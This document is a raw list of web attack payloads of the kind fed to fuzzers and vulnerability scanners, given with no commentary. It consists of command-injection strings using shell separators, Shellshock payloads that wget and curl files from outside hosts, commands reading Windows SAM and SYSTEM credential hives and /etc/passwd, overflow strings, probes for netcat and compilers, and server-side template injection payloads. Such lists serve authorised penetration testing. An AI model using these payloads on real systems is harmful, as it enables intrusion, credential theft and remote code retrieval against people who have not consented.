|
||
|
&& system('sleep 5');
|
||
|
system('sleep 5')
|
||
|
system('sleep 5');
|
||
|
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
|
||
|
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
|
||
|
system('whoami')
|
||
|
system('whoami');
|
||
|
test*; ls -lhtR /var/www/
|
||
|
test* || perl -e 'print "X"x16096'
|
||
|
test* | perl -e 'print "X"x16096'
|
||
|
test* & perl -e 'print "X"x16096'
|
||
|
test* && perl -e 'print "X"x16096'
|
||
|
test*; perl -e 'print "X"x16096'
|
||
|
$(`type C:\boot.ini`)
|
||
|
&&type C:\\boot.ini
|
||
|
| type C:\Windows\repair\SAM
|
||
|
; type C:\Windows\repair\SAM
|
||
|
& type C:\Windows\repair\SAM
|
||
|
&& type C:\Windows\repair\SAM
|
||
|
type C:\Windows\repair\SAM
|
||
|
| type C:\Windows\repair\SYSTEM
|
||
|
; type C:\Windows\repair\SYSTEM
|
||
|
& type C:\Windows\repair\SYSTEM
|
||
|
&& type C:\Windows\repair\SYSTEM
|
||
|
type C:\Windows\repair\SYSTEM
|
||
|
| type C:\WINNT\repair\SAM
|
||
|
; type C:\WINNT\repair\SAM
|
||
|
& type C:\WINNT\repair\SAM
|
||
|
&& type C:\WINNT\repair\SAM
|
||
|
type C:\WINNT\repair\SAM
|
||
|
type C:\WINNT\repair\SYSTEM
|
||
|
| type %SYSTEMROOT%\repair\SAM
|
||
|
; type %SYSTEMROOT%\repair\SAM
|
||
|
& type %SYSTEMROOT%\repair\SAM
|
||
|
&& type %SYSTEMROOT%\repair\SAM
|
||
|
type %SYSTEMROOT%\repair\SAM
|
||
|
| type %SYSTEMROOT%\repair\SYSTEM
|
||
|
; type %SYSTEMROOT%\repair\SYSTEM
|
||
|
& type %SYSTEMROOT%\repair\SYSTEM
|
||
|
&& type %SYSTEMROOT%\repair\SYSTEM
|
||
|
type %SYSTEMROOT%\repair\SYSTEM
|
||
|
uname
|
||
|
;uname;
|
||
|
| uname -a
|
||
|
; uname -a
|
||
|
& uname -a
|
||
|
&& uname -a
|
||
|
uname -a
|
||
|
|/usr/bin/id
|
||
|
;|/usr/bin/id|
|
||
|
;/usr/bin/id|
|
||
|
$;/usr/bin/id
|
||
|
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
|
||
|
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
|
||
|
| wget http://crowdshield.com/.testing/rce.txt
|
||
|
& wget http://crowdshield.com/.testing/rce.txt
|
||
|
; wget https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
|
||
|
&& wget https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
wget https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
|
||
|
which curl
|
||
|
which gcc
|
||
|
which nc
|
||
|
which netcat
|
||
|
which perl
|
||
|
which python
|
||
|
which wget
|
||
|
whoami
|
||
|
| whoami
|
||
|
; whoami
|
||
|
' whoami
|
||
|
' || whoami
|
||
|
' & whoami
|
||
|
' && whoami
|
||
|
'; whoami
|
||
|
" whoami
|
||
|
" || whoami
|
||
|
" | whoami
|
||
|
" & whoami
|
||
|
" && whoami
|
||
|
"; whoami
|
||
|
$(`whoami`)
|
||
|
& whoami
|
||
|
&& whoami
|
||
|
{{ get_user_file("C:\boot.ini") }}
|
||
|
{{ get_user_file("/etc/hosts") }}
|
||
|
{{ get_user_file("/etc/passwd") }}
|
||
|
{{4+4}}
|
||
|
{{4+8}}
|
||
|
{{person.secret}}
|
||
|
{{person.name}}
|
||
|
{1} + {1}
|
||
|
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
|
||
|
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
|